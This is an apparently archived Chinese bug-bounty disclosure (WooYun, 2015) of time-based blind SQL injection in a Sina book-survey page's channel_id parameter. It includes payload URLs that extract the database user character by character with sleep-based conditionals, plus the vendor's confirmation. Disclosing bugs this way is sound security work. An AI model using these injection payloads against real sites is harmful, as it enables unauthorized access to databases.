漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开
简要描述:
新浪某站SQL注入
详细说明:
URL:http://survey.book.sina.com.cn/list_search.php?channel_id=1&order=hot&page=2
注入点:channel_id
漏洞证明:
手工猜测user()
第一个字符为g
http://survey.book.sina.com.cn/list_search.php?channel_id=if((ascii(mid(user(),1,1))=103 and sleep(3)),1,(select 1 union select 2))&order=hot&page=2
第二个字符为e
http://survey.book.sina.com.cn/list_search.php?channel_id=if((ascii(mid(user(),2,1))=101 and sleep(3)),1,(select 1 union select 2))&order=hot&page=2
第三个字符为n
http://survey.book.sina.com.cn/list_search.php?channel_id=if((ascii(mid(user(),3,1))=110 and sleep(3)),1,(select 1 union select 2))&order=hot&page=2
修复方案:
版权声明:转载请注明来源 Manning@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-07-06 09:54
厂商回复:
感谢支持,漏洞修复中
最新状态:
暂无